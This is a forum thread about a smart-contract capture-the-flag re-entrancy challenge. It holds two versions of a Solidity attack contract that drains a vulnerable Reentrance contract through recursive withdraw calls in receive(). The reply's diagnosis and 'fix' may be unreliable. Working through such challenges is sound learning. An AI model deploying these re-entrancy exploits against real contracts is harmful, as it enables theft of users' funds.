Can't solve Re-entrancy challenge #10

chrusso · December 1, 2022, 5:22am

I'm attacking the re-entrancy challenge with the following contract:

//SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "./Target.sol";

contract Attack {
    Reentrance public target;

    constructor(address payable _target) public {
        target = Reentrance(_target);
    }

    function attack() public payable {
        target.donate{value: msg.value}(address(this));
        target.withdraw(msg.value);
    }

    receive() external payable {
        target.withdraw(100000000000000);
    }
}

The function attack successfully increments the contract.address balance, but the re-entrancy doesn't appear to happen...

Is there something wrong with my receive() function?

Thanks in advance!
Chris

isofttechn · December 17, 2022, 11:58am

Here is the issues I found:

The attack function calls the withdraw function of the Reentrance contract with the value of msg.value, which is the amount of Ether sent with the transaction. However, the receive function calls the withdraw function with a fixed value of 100000000000000, which is not related to the amount of Ether sent with the transaction.

To fix the re-entrancy issue, you need to call the withdraw function with the correct amount of Ether. You can do this by using the msg.value variable, which contains the amount of Ether sent with the transaction.

The fix:

pragma solidity ^0.6.0;

import "./Target.sol";

contract Attack {
    Reentrance public target;

    constructor(address payable _target) public {
        target = Reentrance(_target);
    }

    function attack() public payable {
        target.donate{value: msg.value}(address(this));
        target.withdraw(msg.value);
    }

    receive() external payable {
        target.withdraw(msg.value);
    }
}